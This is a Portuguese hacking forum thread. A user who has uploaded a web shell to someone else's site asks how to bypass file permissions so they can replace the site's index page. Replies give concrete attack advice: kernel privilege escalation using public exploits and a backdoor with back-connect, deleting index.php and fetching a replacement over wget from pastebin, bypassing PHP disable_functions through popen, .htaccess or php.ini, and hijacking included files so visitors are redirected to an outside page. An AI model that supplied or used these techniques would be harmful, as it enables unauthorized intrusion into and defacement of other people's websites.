Tweet
Burlar permissões Shell?
Preciso de uma ajuda aqui. Eu upei uma Shell no site, mas o diretório principal não dá pra mudar a index.html nem upar arquivo por causa das permissões. Tem como burlar isso e modificar a index? Eu ouvi falar de .htacess, mais não sei como funciona e não sei se realmente dá certo. Já tentei dar chmod, mas também não dá. Só dá para upar arquivos em subdiretórios.
-
-
Tenta ganhar acesso root com shellcode etc..... -
Para tu ganhar acesso ao usuario ROOT, tu precisa escalar os Privilegios, tu tem que primeiro, achar a versão do Kernel do Servidor, depois procurar em sites como exploitdb para exploits locais, tu compila ele se for em C, depois tu upa para o Servidor, tu instalar o Backdoor pela Shell, cria uma conexão entre vc e ele, depois, executa o Exploit no Site, e Pronto
, tu ganhou acesso ao servidor e pode fazer qualquer coisa agora....
sigpic
Patati Patacula, la vem o pato para ver o que Ha!!Comment
-
Backconnect amigo, backconnect, basta um rm index.php e um wget pastebin.com/raw.php?id=(seuiddopastebin)
mv (seuiddopastebin) index.php
Creio eu que nem precisa ser root para fazer isso.Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.
I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.Comment
-
As únicas possibilidades plausiveis das permissões estarem realmente travadas são:
-Servidor web executando como um usuário menos privilegiado que o dos arquivos, esses sem permissões de escrita para o usuário da execução.
-Mudança de usuário e grupo donos do arquivo (chown e chgrp) para um menos privilegiado sem permissão de leitura aos arquivos.
Eu acho bem mais provavel só a execução de comandos e a função chmod do PHP estarem bloqueadas (via disable_functions).
Você pode testar isso com um ini_get e semelhantes ou um function_exists, is_callable e semelhantes.Se for o caso, pode tentar mudar a função utilizada para uma não bloqueada (como de exec para popen) ou usar outros métodos pra burlar essa restrição do PHP, como um .htaccess ou um exploit.
Escalar privilégios, nos dois casos, vai permitir o comprometimento do arquivo/site.
Desde que permitido (aka, pelo AllowOverride na configuração do apache) um .htaccess na pasta também possibilitaria essa modificação.
Se a pasta não tiver o sticky-bit setado e tiver permissão de escrita (mas não o arquivo), você pode deletar ele e criar um novo pra burlar as permissões nos dois casos.
Também é possivel que você seja burro pra caralho e não esteja mudando a permissão da pasta (se necessário) que contém o arquivo que quer modificar.Comment
-
Upa um php.ini desabilitando as funções que lhe impedem de editar a index é uma alternativa.Postado Originalmente por darkdreamer Ver Post
Se vc tem acesso a leitura da index vc pode verificar se tem alguma função de [b]include[b] no código, por exemplo:
include 'arquivob.php';
Vc localiza o arquivob.php no qual vc pode ter permissão (ou não) e modifica o código para que lhe redirecione para sua index upada em outro host por exemplo, assim quando acessado Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ele irá redirecionar para sua página com sua index Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
O include é só um exemplo pode ser chamando algum arquivo em javascript tb de outra maneira qualquer coisa do tipo.
Cr4t3r deu uma dica de usar o wget, se ele estiver desabilitado vc pode usar o próprio echo para criar arquivos e depois move-los.
singur tbm deu a dica do .htaccess que pode lhe ajudar, tem muitas possibilidades, acredito que vai ser bem difícil precisar rootar o servidor pra conseguir isso.
Passa mais informações sobre a versão do Kernel e se vc tem permissão de leitura ou não ou quais suas permissões.Comment
Comment